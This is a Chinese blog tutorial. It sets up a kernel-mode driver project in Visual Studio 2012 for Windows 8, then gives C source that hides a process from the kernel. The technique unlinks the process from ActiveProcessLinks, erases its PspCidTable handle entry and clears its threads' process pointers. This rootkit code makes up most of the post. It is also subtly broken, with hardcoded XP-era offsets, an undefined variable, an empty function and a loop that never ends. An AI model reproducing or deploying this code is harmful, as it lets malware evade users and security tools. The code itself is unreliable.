用Visual studio2012在Windows8上开发内核中隐藏进程

最新推荐文章于 2022-12-13 15:31:41 发布
最新推荐文章于 2022-12-13 15:31:41 发布
阅读量6.1k 收藏 5
点赞数 1
分类专栏: VC++编程技术 Visual C++2010编程技术 Visual Studio 11开发专栏 Windows8开发专栏 文章标签: windows table null system list
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/itcastcpp/article/details/7885412
版权

在Windows NT中,80386保护模式的“保护”比Windows 95中更坚固,这个“镀金的笼子”更加结实,更加难以打破。在Windows 95中,至少应用程序I/O操作是不受限制的,而在Windows NT中,我们的应用程序连这点权限都被剥夺了。在NT中几乎不太可能进入真正的ring0层。 
在Windows NT中,存在三种Device Driver:

  1.“Virtual device Driver” (VDD)。通过VDD,16位应用程序,如DOS 和Win16应用程序可以访问特定的I/O端口(注意,不是直接访问,而是要通过VDD来实现访问)。

  2.“GDI Driver”,提供显示和打印所需的GDI函数。

  3.“Kernel Mode Driver”,实现对特定硬件的操作,比如说CreateFile, CloseHandle (对于文件对象而言), ReadFile, WriteFile, DeviceIoControl 等操作。“Kernel Mode Driver”还是Windows NT中唯一可以对硬件中断和DMA进行操作的Driver。SCSI 小端口驱动和 网卡NDIS 驱动都是Kernel Mode Driver的一种特殊形式。

 

 

Visual studio2012与Windows8带来格外不同的新体验

 

1.启动Vs2012


2.看见满目的驱动开发模板

3.选择一个驱动模式,有内核模式与用户模式两种的驱动

 

4.创建一个驱动程序,KMDF DriverMVP

 

5.我们选择的是内核模式的驱动程序,下面是创建成功后的界面,分别是驱动程序本身,与驱动安装包

6.按下F5,选择驱动编译,

 


插入下列代码实现内核隐藏进程

头文件

#ifndef DBGHELP_H
#define DBGHELP_H 1




#include <ntifs.h>




/************************************************************************/
/* 重量级结构的申明                                                                     */
/************************************************************************/


typedef struct _HANDLE_TABLE {
    ULONG Flags;
    LONG HandleCount;
    PHANDLE_TABLE_ENTRY **Table;
    struct _EPROCESS *QuotaProcess;
    HANDLE UniqueProcessId;
    LONG FirstFreeTableEntry;
    LONG NextIndexNeedingPool;  
    ERESOURCE HandleTableLock; 
    LIST_ENTRY HandleTableList;
    KEVENT HandleContentionEvent;
} HANDLE_TABLE, *PHANDLE_TABLE;  

typedef BOOLEAN (*EX_ENUMERATE_HANDLE_ROUTINE)(
											   IN PHANDLE_TABLE_ENTRY HandleTableEntry,
											   IN HANDLE Handle,
											   IN PVOID EnumParameter
											   );
typedef BOOLEAN(*__ExEnumHandleTable)(
									  IN PHANDLE_TABLE HandleTable,
									  IN EX_ENUMERATE_HANDLE_ROUTINE EnumHandleProcedure,
									  IN PVOID EnumParameter,
									  OUT PHANDLE Handle OPTIONAL 
    );

typedef BOOLEAN (*EXENUMHANDLETABLE)(
									 IN PHANDLE_TABLE HandleTable,
									 IN EX_ENUMERATE_HANDLE_ROUTINE EnumHandleProcedure,
									 IN PVOID EnumParameter,
									 OUT PHANDLE Handle OPTIONAL
									   );

/************************************************************************/
/* 申明一些全局变量                                                                     */
/************************************************************************/
ULONG    g_Offset_Eprocess_Name=0;
ULONG    g_Offset_Eprocess_Flink = 0;
ULONG    g_Offset_Eprocess_ProcessId = 0;
ULONG    g_Offset_Eprocess_HandleTable = 0;
__ExEnumHandleTable ExEnumHandleTable ;

PEPROCESS  g_pEprocess_System = 0;
ULONG trytimes=0;
ULONG error=0;

/************************************************************************/
/* 申明一些函数                                                                     */
/************************************************************************/

BOOLEAN EnumHandleCallback(PHANDLE_TABLE_ENTRY HandleTableEntry,IN HANDLE Handle,PVOID EnumParameter
);


NTSTATUS 
EraseObjectFromHandleTable(
						   PHANDLE_TABLE pHandleTable,
						   IN ULONG ProcessId 
);

VOID RemoveNodeFromActiveProcessLinks(
  IN ULONG ProcessId
  );

VOID
HideProcessById(
  IN ULONG ProcessId
);


NTSTATUS 
LookupProcessByName(
					OUT PEPROCESS pEprocess 
					);

NTSTATUS 
InitializeCommonVariables(
    );

NTSTATUS GetProcessNameOffset(
					 OUT PULONG Offset OPTIONAL 
);

BOOLEAN IsValidModule(ULONG i);

void Search();

ULONG GetAddrFromProcessId();


VOID ClearMZMask();

#endif


 

 

源文件

VOID BreakThreadByProcess(ULONG Pid)
{
/*++

Routine Description:

	将所有线程ETHREAD结构的ThreadsProcess抹掉

Return Value:
VOID

--*/
	PEPROCESS eProcess;
	PETHREAD eThread;
	PLIST_ENTRY pList;
	
	PsLookupProcessByProcessId(Pid,&eProcess);
	pList = eProcess->Pcb.ThreadListHead.Blink;
	while (pList != eProcess->Pcb.ThreadListHead.Flink)
	{
		eThread = (PETHREAD)(CONTAINING_RECORD(pList,KTHREAD,ThreadListEntry));
		eThread->ThreadsProcess = 0;
		pList = pList->Blink;
	}
	
}


VOID ClearMZMask()
{
/*++



Routine Description:

	擦除PE文件MZ,PE标志

Return Value:
VOID

--*/
	PVOID addr;
	ULONG pid;
	PEPROCESS eProcess;
	KAPC_STATE apcstatus;


	pid = ProtectPid;
	PsLookupProcessByProcessId(pid,&eProcess);

	KeStackAttachProcess(eProcess,&apcstatus);


	KeUnstackDetachProcess(&apcstatus);
}



ULONG GetAddrFromProcessId() 
{ 
/*++



Routine Description:

	搜索PsLookupProcessByProcessId函数得到PspCidTable的地址
	ppPspCidTable:返回PspCidTable表地址

Return Value:
VOID

--*/
	UNICODE_STRING pslookup; 
	PUCHAR  addr; 
	PUCHAR p; 
	ULONG q; 
	RtlInitUnicodeString(&pslookup,L"PsLookupProcessByProcessId"); 
	addr=(PUCHAR)MmGetSystemRoutineAddress(&pslookup); 
	
	for(p=addr;p<addr+PAGE_SIZE;p++) 
	{ 
		if((*(PUSHORT)p==0x35ff)&&(*(p+6)==0xe8)) 
		{   
			q=*(PULONG)(p+2); 
			return q; 
			break; 
		} 
	} 
	return 0; 
}





BOOLEAN 
EnumHandleCallback(
IN PHANDLE_TABLE_ENTRY HandleTableEntry,
IN HANDLE Handle,
IN OUT PVOID EnumParameter 
)
{
    if(ARGUMENT_PRESENT(EnumParameter)&&*(HANDLE*)EnumParameter==Handle)
    {
        *(PHANDLE_TABLE_ENTRY*)EnumParameter=HandleTableEntry ;
        return TRUE ;
    }
    return FALSE ;
}





// 修改一下,可以传递要擦除的ID做参数
NTSTATUS 
EraseObjectFromHandleTable(
PHANDLE_TABLE pHandleTable,
IN ULONG ProcessId 
)
{
/*++



Routine Description:
  擦出PspCidTable结构中的句柄
  pHandleTable:指向句柄表指针
  ProcessId:进程的PID
 Return Value:
VOID

--*/

    NTSTATUS status ;
    
    PVOID EnumParameter ;
    UNICODE_STRING uniExEnumHandleTable ;
    
    __ExEnumHandleTable ExEnumHandleTable ;
    
    status=STATUS_NOT_FOUND ;
    EnumParameter=ProcessId ;
    
    
    RtlInitUnicodeString(&uniExEnumHandleTable,L"ExEnumHandleTable");
    ExEnumHandleTable=MmGetSystemRoutineAddress(&uniExEnumHandleTable);
    
    if(NULL==ExEnumHandleTable)
    {
        return STATUS_NOT_FOUND ;
    }
    
    // Enum后可以擦除,Callback过程中不能擦除
    if(ExEnumHandleTable(pHandleTable,EnumHandleCallback,&EnumParameter,NULL))
    {
        InterlockedExchangePointer(&((PHANDLE_TABLE_ENTRY)EnumParameter)->Object,NULL);
        status=STATUS_SUCCESS ;
    }
    
    return status ;
}





VOID RemoveNodeFromActiveProcessLinks(
  IN ULONG ProcessId
  )
{
/*++



Routine Description:
  移除进程EPROCESS结构中的ActiveProces中自己的链表
  ProcessId:进程的PID
 Return Value:
VOID

--*/
	NTSTATUS status;

    LIST_ENTRY  *pListEntry;
    PEPROCESS  pEprocess;
	status = PsLookupProcessByProcessId(ProcessId,&pEprocess);
	if (!NT_SUCCESS(status))
	{
		DbgPrint("PsLookupProcessByProcessId Error!\n");
		return ;
	}
//	ObDereferenceObject(pEprocess);


	pListEntry = (LIST_ENTRY *)((ULONG)pEprocess + 0x88);

	pListEntry->Flink->Blink = pListEntry->Blink;
	pListEntry->Blink->Flink = pListEntry->Flink;


}


VOID
HideProcessById(
				IN ULONG ProcessId 
				)
{
    NTSTATUS status ;
    HANDLE_TABLE *pPspCidTable ;
    PEPROCESS pCsrssEprocess=NULL ;
    
    

        status=InitializeCommonVariables();

    
    pPspCidTable = (HANDLE_TABLE *)GetAddrFromProcessId();
    
    

    status=LookupProcessByName(pCsrssEprocess);
    

   
    // 先从活动进程链表中摘除
   RemoveNodeFromActiveProcessLinks(ProcessId);
    
    
    // 擦除PspCidTable中对应的Object
    EraseObjectFromHandleTable(pPspCidTable,ProcessId);
    
    
    // 擦除Csrss进程中那份表,无数次蓝屏,所以坚决放弃
//    EraseObjectFromHandleTable(*(PULONG)((ULONG)pCsrssEprocess+0x0c4),ProcessId);
    
    
    return ;
}



NTSTATUS 
LookupProcessByName(
					OUT PEPROCESS pEprocess 
					)
{
	PEPROCESS esProcess;
	LIST_ENTRY *listen;
	esProcess = PsGetCurrentProcess();

	while (1)
	{
		listen = ((LIST_ENTRY *)((ULONG)esProcess + 0x88))->Blink;
		esProcess= (EPROCESS *)((ULONG)listen - 0x88);
		DbgPrint("Process is %s\n",(WCHAR *)((ULONG)esProcess + 0x174));
		if (!strncmp((WCHAR *)((ULONG)esProcess + 0x174),"csrss.exe",strlen("csrss.exe")))
		{
			DbgPrint("Process Name is %s\n",(WCHAR *)((ULONG)esProcess + 0x174));
			pEprocess = esProcess;
			DbgPrint("CSRSSS EPROCESS IS 0x%x\n",(ULONG)esProcess);
			return STATUS_SUCCESS;
			break;
		}
		listen = ((LIST_ENTRY *)((ULONG)esProcess + 0x88));
	} 

}



NTSTATUS 
GetProcessNameOffset(
					 OUT PULONG Offset OPTIONAL 
					 )
{
    NTSTATUS status ;
    PEPROCESS curproc ;
    ULONG i ;
    
    if(!MmIsAddressValid((PVOID)Offset))
    {
        status=STATUS_INVALID_PARAMETER ;
        return status ;
    }
    
    curproc=PsGetCurrentProcess();
    
    //
    // 然后搜索KPEB,得到ProcessName相对KPEB的偏移量
    // 偏移174h的位置,这里存的是进程的短文件名,少数地方用,
    // 比如SoftIce的addr和proc命令,如果名称超过16个字符直接截断
    
    // Scan for 12KB, hopping the KPEB never grows that big!
    //
    for(i=0;i<3*PAGE_SIZE;i++)
    {
        
        if(!strncmp("System",(PCHAR)curproc+i,strlen("System")))
        {
            *Offset=i ;
            status=STATUS_SUCCESS ;
            break ;
        }
    }
    return status ;
}


NTSTATUS 
InitializeCommonVariables(
)
{
    NTSTATUS status ;
    ULONG uMajorVersion ;
    ULONG uMinorVersion ;
    
    status=GetProcessNameOffset(&g_Offset_Eprocess_Name);
    
    if(!NT_SUCCESS(status))
    {
        return status ;
    }
    
    g_pEprocess_System=PsGetCurrentProcess();
    
    PsGetVersion(&uMajorVersion,&uMinorVersion,NULL,NULL);
    
    if(uMajorVersion==4&&uMinorVersion==0)
    {
        g_Offset_Eprocess_Flink=152 ;
        // Stop supporting NT 4.0
        return STATUS_UNSUCCESSFUL ;
    }
    else if(uMajorVersion==5&&uMinorVersion==0)
    {
        g_Offset_Eprocess_ProcessId=156 ;
        g_Offset_Eprocess_Flink=160 ;
        g_Offset_Eprocess_HandleTable=0x128 ;
    }
    else if(uMajorVersion==5&&uMinorVersion==1)
    {
        g_Offset_Eprocess_ProcessId=132 ;
        g_Offset_Eprocess_Flink=136 ;
        g_Offset_Eprocess_HandleTable=0xC4 ;
    }
    else if(uMajorVersion==5&&uMinorVersion==2)
    {
        g_Offset_Eprocess_ProcessId=132 ;
        g_Offset_Eprocess_Flink=136 ;
        g_Offset_Eprocess_HandleTable=0xC4 ;
    }
    
    return STATUS_SUCCESS ;
}

/*++

Routine Description:
  得到各个变量的偏移
 Return Value:
VOID

--*/


 

 

 

尹成
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
在团队开发环境使用VisualStudio.NET
03-05
摘要:本文提供了如何在团队开发环境使用VisualStudio.NETBeta2的指导。本文假设需要由多个开发人员开发同一个项目,并且他们使用VisualSourceSafe进行源代码控制。目录简介设置文件共享访问模式在...
(渗透测试后期)Linux进程隐藏详解
热门推荐
qq_42882717的博客
03-27 1万+
文章目录(渗透测试后期)Linux进程隐藏详解前言Linux进程基础Linux进程侦查手段Linux进程隐藏手段一、基于用户态的进程隐藏方法1:小隐隐于/proc/pid——劫持readdir系统调用额外:加载至arm方法2:小隐隐于/proc/pid——mount 挂载二、基于内核态的进程隐藏方法3:大隐隐于内核——修改内核源码+系统调用方法4:大隐隐于内核——修改内核源码proc_pid_lookup方法5:大隐隐于内核——编写驱动/内核模块——LKM实现进程隐藏总结 (渗透测试后期)Linux进程隐藏
遍历PspCidTable表检测隐藏进程
08-11 330
一、PspCidTable概述 PspCidTable也是一个句柄表,其格式与普通的句柄表是完全一样的,但它与每个进程私有的句柄表有以下不同: 1.PspCidTable存放的对象是系统所有的进程线程对象,其索引就是PID和TID。 2.PspCidTable存放的直接是对象体(EPROCESS和ETHREAD),而每个进程私有的句柄表则存放的是对象头(OBJECT_HE...
驱动级Rootkit攻击测试——进程隐藏
摔不死的笨鸟的博客
09-16 628
学习内核编程,祝早日能编写POC程序! SSDT HOOK NtOpenProcess typedef NTSTATUS(*pfnNtOpenProcess)( PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PCLIENT_ID); pfnNtOpenProcess OldNtOpenProcess; 定义一个指向API的函数指针定义方法。作用是定义API函数指针备份原来的函数地址。 typedef struct _SERVICE_DESCRIPTOR_T
隐藏进程内核
qq_31507523的博客
04-09 2609
隐藏进程内核版实现 隐藏进程通常出现在恶意程序隐藏进程能让任务管理器、procexp等3环的程序无法找到它,那么如何实现隐藏进程呢? 由于对这方面还是很感兴趣,今天就来研究一下内核层的隐藏进程,首先在用户层3环,如任务管理器、procexp遍历进程都是使用CreateToolhelp32Snapshot()API创建快照遍历查找的,使用快照的API在内核就是通过访问一个双向链表的数据结构...
Visual Studio 2012/2010开发混合应用程序
04-06
嗨,大家好,我想知道,我们是否可以在Visual Studio 2012/2010创建Hybrid移动应用程序? 所有搜索结果都导航到VS2013 Update 4(这不是免费版本)或某些第三方应用程序,例如Telerik(这也不是免费版本)。 我有....
Visual Studio 2019配置出C51单片机开发环境
01-20
Visual Studio 2019配置C51单片机开发环境 本文参考了VS2008调用Keil实现单片机c语言编程.因其太过古老且啰嗦,所以我重新写了以下教程,成功后的效果大致如下: 前提:你的电脑里面要先安装keil C51 和Visual ...
如何在带有MDF数据库的Visual Studio 2012部署Windows窗体应用程序
04-07
大家好,我已经创建了一个Windows窗体应用程序,现在想使用安装盾来部署它的安装程序,并且我想要部署应用程序,以便在用户端他/她能够通过单击->同意->下一步进行安装->我已经愿意做的确定类型设置,但是问题是...
内核下断链隐藏进程(兼容多版本Windows系统,非硬编码)
Think88666的博客
09-01 1235
内核下断链隐藏进程(兼容多版本Windows系统,非硬编码)
进程隐藏工具--内核驱动实现
12-21
可以实现进程的遍历和隐藏,自己写的,希望大家批评指正,谢谢!
Linux当如何隐藏和查看进程
因上努力,果上随缘。但行好事,莫问前程。
09-02 7070
进程是执行程序的过程,类似于按照图纸,真正去盖房子的过程。同一个程序可以执行多次,每次都可以在内存开辟独立的空间来装载,从而产生多个进程。不同的进程还可以拥有各自独立的IO接口。操作系统的一个重要功能就是为进程提供方便,比如说为进程分配内存空间,管理进程的相关信息等等,就好像是为我们准备好了一个精美的地址。进程信息是proc目录下动态生成,每个动态创建的进程ID号下面详细的记录了关于该进程的fd,mem,io,cpuset等进程信息。
关于PsGetProcessImageFileName获取结果不全的问题
DaiCharlie的博客
12-13 551
就是这个函数是获得EPROCESS结构体的ImageFileName,而这个变量是15字节长度,超过就会截断。所以获取到的就不是准确的,下面给出准确获取的方法链接。
隐藏进程
yaneng的专栏
06-18 1099
本人收集与网络,不知原作者是谁……一:序言下列情况不在讨论之(没进程)1 通过CreateRemoteThread Inject代码到另一个进程(有种病毒就用这种方法,实现内存感染的;其实还有更多应用)2 通过CreateRemoteThread LoadLibray一dll到另一个进程(屏蔽Ctrl+Alt+Del,就是通过这种方法和SetWindowLog实现)二:进程隐藏1 Hook/In
内核层 inlinehook 隐藏进程
ShadowAssassin的专栏
12-17 3693
上次是SSDT  HOOK 方式 隐藏 进程 ,如链接:http://blog.csdn.net/hjxyshell/article/details/16993119 这次是InlineHook 方式隐藏进程,这里inline hook的原理就不做详细介绍了,网上相关资源较多,撸主主要参考看雪的某大牛的“详谈内核三步走Inline Hook实现”(http://bbs.pediy.com/s
_EPROCESS断链 —— 实现进程内核隐藏
walker的博客
03-06 2141
我们可以利用 _EPROCESS 结构体的 ActiveProcessLinks 双向链表遍历进系统进程,并将特定进程从该双向链表移除,以达到隐藏特定进程的目的。 _EPROCESS _EPROCESS 结构体是内核用于管理和维护进程的结构体,每个进程都会有一个属于自己的结构体。同一个程序创建了多个进程,其就会有对应个数的 _EPROCESS 。 _EPROCESS 的结构如下: kd> dt _EPROCESS nt!_EPROCESS +0x000 Pcb
内核隐藏进程
weixin_42798090的博客
03-11 278
内核隐藏进程 写了个WIN7隐藏驱动程序,不多说什么,贴代码,主要包括驱动程序和应用程序。 开发环境:win7+VS2012+WDK8.0 其他操作系统不支持 详情请看附件,大牛勿喷…… / /驱动程序:`在这里插入代码片` //********************************* //fsjaky //blog:http://blog.csdn.net/fsjaky //*****...
Win10内核驱动断链式隐藏指定进程
WorryFree
12-02 2542
Win10内核隐藏进程
如何在Windows上使用Visual Studio进行编译
最新发布
06-04
Windows上,可以使用Visual Studio进行编译。以下是使用Visual Studio进行编译的步骤: 1. 安装Visual Studio:从Visual Studio官网(https://visualstudio.microsoft.com/)下载并安装Visual Studio。 2. 安装...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尹成

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值